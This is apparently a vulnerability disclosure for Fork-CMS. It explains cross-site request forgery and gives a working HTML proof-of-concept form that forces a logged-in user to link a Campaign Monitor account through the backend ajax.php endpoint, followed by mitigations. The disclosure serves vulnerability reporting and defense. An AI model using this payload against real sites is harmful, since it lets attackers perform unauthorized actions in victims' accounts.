====================================================================================

Fork-CMS CSRF:

Introduction

Author: Rafay Baloch

CSRF OR XSRF (Cross site request forgery) occurs when the victim forces
your browser to send a forged request and makes

the victim performing a particular action. Any form missing with CSRF
tokens is vulnerable to it.

Impact:

An attacker can accomplish multiple things, he could change the victims
form details etc.


PROOF OF CONCEPT:

The above two forms are misssing with CSRF tokens:


The form is missing with CSRF tokens which means that an attacker can force
a user to link to a campaign monitor account.

http://demo.fork-cms.com/private/en/mailmotor/settings?token=true#tabSettingsAccount

POC:

<html>

  <body>
    <form action="http://demo.fork-cms.com/backend/ajax.php" method="POST">
      <input type="hidden" name="fork&#91;module&#93;" value="mailmotor" />
      <input type="hidden" name="fork&#91;action&#93;"
value="link&#95;account" />
      <input type="hidden" name="fork&#91;language&#93;" value="en" />
      <input type="hidden" name="url" value="www&#46;google&#46;com" />
      <input type="hidden" name="username" value="rafaybaloch" />
      <input type="hidden" name="password" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

http://demo.fork-cms.com/private/en/settings/email
http://demo.fork-cms.com/backend/ajax.php

Mitigations:

- Reauthenticate the user, if he performs an important action upon his
account, e.g delete a user, delete himselves etc.
- Add a CSRF token to each and every request and make sure that it is
validated upon the server.